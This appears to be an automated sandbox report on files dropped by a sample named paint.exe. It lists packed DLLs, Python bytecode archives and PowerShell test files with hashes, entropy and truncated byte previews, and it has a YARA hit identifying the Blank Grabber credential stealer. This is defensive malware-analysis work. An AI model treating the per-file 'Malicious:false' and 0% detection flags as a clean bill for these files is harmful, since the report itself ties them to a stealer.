                                                                                                                                                                                                                                                              SHA-512:7C9F0F8E53B363EF5B2E56EEC95E7B78EC50E9308F34974A287784A1C69C9106F49EA2D9CA037F0A7B3C57620FCBB1C7C372F207C68167DF85797AFFC3D7F3BA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......^.....`A............................................^............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1333418
                                                                                                                                                                                                                                                              Entropy (8bit):5.586394615389979
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12288:q8lJGUmc4rmn9OPNsxuy4htMHc1b4oDAH2tQR+lBfdmsP/HINa9/Rr2/Hq:q8lJGUQ697lH2WEfdmsPvBt2/Hq
                                                                                                                                                                                                                                                              MD5:0CB8186855E5A17427AA0F2D16E491A9
                                                                                                                                                                                                                                                              SHA1:8E370A2A864079366D329377BEC1A9BBC54B185C
                                                                                                                                                                                                                                                              SHA-256:13E24B36C20B3DA9914C67B61614B262F3FC1CA7B2EE205DED41ACC57865BFEF
                                                                                                                                                                                                                                                              SHA-512:855FF87E74E4BD4719DB5B17E577E5AE6CA5EEDD539B379625B28BCCDF417F15651A3BACF06D6188C3FCAAC5814DEE753BF058F59F73C7050A0716AA7E718168
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:PK..........!..[..Z...Z......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):112878
                                                                                                                                                                                                                                                              Entropy (8bit):7.747901064486674
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:69JWhAScHeNs0hxZl3Urc2dfdgAiN4DE7+zlaY3y28CT7cB+xMDlhLxZYFSHgAdm:E3HJ0hzdUndcSzOSMB+xoHvdw0NY
                                                                                                                                                                                                                                                              MD5:4021972780A9E20381E924565F92D71F
                                                                                                                                                                                                                                                              SHA1:C262C1413C31AD54C7FE360F656B9A5BBBF5D70D
                                                                                                                                                                                                                                                              SHA-256:CA9649C12BABFF458759F48C5DF74FCCA1A586BF4F93F5077C34C090C9D39ACC
                                                                                                                                                                                                                                                              SHA-512:AE2692B8E63D255FBD249117F639AD5F096CB052980A8C35ED55F204CCE77F52E3441E475C8342A568AF1D48F74CF59E139A1AC4E533D2BA4AFA4A4EDCAE6A3A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:PK..........%Z..b.x...x.......stub-o.pyc.........6zg.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1630488
                                                                                                                                                                                                                                                              Entropy (8bit):7.952879310777133
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
                                                                                                                                                                                                                                                              MD5:8377FE5949527DD7BE7B827CB1FFD324
                                                                                                                                                                                                                                                              SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
                                                                                                                                                                                                                                                              SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
                                                                                                                                                                                                                                                              SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):29968
                                                                                                                                                                                                                                                              Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                                              MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                                              SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                                              SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                                              SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):227096
                                                                                                                                                                                                                                                              Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                                                              MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                                                              SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                                                              SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                                                              SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1812848
                                                                                                                                                                                                                                                              Entropy (8bit):7.994007517095959
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:49152:pNjX6MHvtDLakdn4IozsdcnIHvOgWgpZitPvrVW:C0JLJdGwWIHGvgkg
                                                                                                                                                                                                                                                              MD5:3C5C6C489C358149C970B3B2E562BE5F
                                                                                                                                                                                                                                                              SHA1:2F1077DB20405B0A176597ED34A10B4730AF3CA9
                                                                                                                                                                                                                                                              SHA-256:73A22A12EA3D7F763ED2CEA94BB877441F4134B40F043C400648D85565757741
                                                                                                                                                                                                                                                              SHA-512:D3FB4E5DF409BF2DE4F5DC5D02D806AEE649A21C339C648248B835C3D5D66AB88312C076C149EAADAA3CE0FB43E6FA293BFA369D8876D6EB18742BD9D12448E3
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......BI.P.(y..(y..(y...x..(y......(y...z..(y...}..(y...|..(y..P...(y.t.x..(y..(x.v)y...t..(y...y..(y......(y...{..(y.Rich.(y.................PE..d....\Og.........." ...*..........P.0"k...P...................................l...........`.........................................H?k......9k......0k......._..J............l. ...........................`.k.(.....k.@...........................................UPX0......P.............................UPX1..........P.....................@....rsrc........0k.....................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):630736
                                                                                                                                                                                                                                                              Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                                              MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                              SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                                              SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                                              SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):456
                                                                                                                                                                                                                                                              Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                                              MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                                              SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                                              SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                                              SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                                              Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):28392
                                                                                                                                                                                                                                                              Entropy (8bit):7.428588990290201
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:6GXglQPmpOpYrOI+QGV7JyUFRYT2Ip4UJCxf1mltdK2363:63lymfrOI+QGVFyUzR9UefI/K2e
                                                                                                                                                                                                                                                              MD5:E49B56F35283DF3AC2A92B28F9C95AE6
                                                                                                                                                                                                                                                              SHA1:F5C1C660310A07DB7A05B8F05F2E4863C88ED2B3
                                                                                                                                                                                                                                                              SHA-256:B60C00672FD0575032C8CB0CFDD7C0559D23C25262C7CC9C8980E05097A3B83C
                                                                                                                                                                                                                                                              SHA-512:F8D295885D098650F2C1DCD2349B4F34BCD7CD6A972AFCE98DE12D4FE8A67F37DCE25B83B1953D19774F7777E1E9B344DA120C8EBBE077CAB0B948EB6C913EFF
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......JJs{.+.(.+.(.+.(.S.(.+.(...).+.(...).+.(...).+.(...).+.(...).+.(.+.(L+.(|..).+.(...).+.(...).+.(...(.+.(...).+.(Rich.+.(........................PE..d....\Og.........." ...*.0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):660472
                                                                                                                                                                                                                                                              Entropy (8bit):7.992389119368911
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:12288:/nhOhXqE88i5E+P5p6YOU7hN8QtcsWO4qlD0kHpM7rLXF81PrtKtD1GjK6T6XgEz:/nWaI6lP5+whKQusF44ZQ3sZKt1+6gX2
                                                                                                                                                                                                                                                              MD5:7C3F235D50514A42905C355C163F5282
                                                                                                                                                                                                                                                              SHA1:E8E9C430F51051CD8352AB23388359100DF6C89B
                                                                                                                                                                                                                                                              SHA-256:ED3C74CC5EFD251897F2A2562679B6102920AC4B9FEDDA0E9F045E09889CB331
                                                                                                                                                                                                                                                              SHA-512:0BB0D79A84CE20302752733942395B83D754A9FE807C608BEEC44D507375C37763C0F15EDF8BB717D306796966BC0A5D4EF10EF4AC87FB78B98A0C40B41F17C7
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........G.x.G.x.G.x.N..K.x.V(y.E.x.V({.C.x.V(|.O.x.V(}.J.x.5/y.D.x.G.y..x..(p.F.x..(x.F.x..(..F.x..(z.F.x.RichG.x.........PE..d....\Og.........." ...*.....0......@.....................................................`..............................................#..........................................................................P...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1016584
                                                                                                                                                                                                                                                              Entropy (8bit):6.669319438805479
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                                                                                                                                                                                              MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                                                                                                                                                                                              SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                                                                                                                                                                                              SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                                                                                                                                                                                              SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):304120
                                                                                                                                                                                                                                                              Entropy (8bit):7.98643761888655
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6144:KL4g17Ziz1gCtki0R7KjUAkDvN/mMHvmCMztFY3oudYnc3M4QI5:KL4Q7Qz1pknmIhxsQKcFQs
                                                                                                                                                                                                                                                              MD5:E0C3EC1835A14FB73A00DE4A6404E352
                                                                                                                                                                                                                                                              SHA1:B74C43242235441AE8328D5AB6DB958E1F8C2743
                                                                                                                                                                                                                                                              SHA-256:4E7FE5FE2259260B0651D517FECAC4F0F324D66F5E4FB4C90DCB1204B9B5049C
                                                                                                                                                                                                                                                              SHA-512:125B7BFBA20E691E7EC24D0AFF271A0DE97CE7D4CBAA0FC4699FB052CE26E3151DD8042E503F41E894468C116073A8619BB35760EF12626D8B506652875C915F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........G..G..G..NfY.A..V..E..V..D..V..O..V..J....D..5..E..G.......F....F...5.F....F..RichG..........PE..d....\Og.........." ...*.`....... ..0....0................................................`.............................................X....................@......................................................0...@...........................................UPX0..... ..............................UPX1.....`...0...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
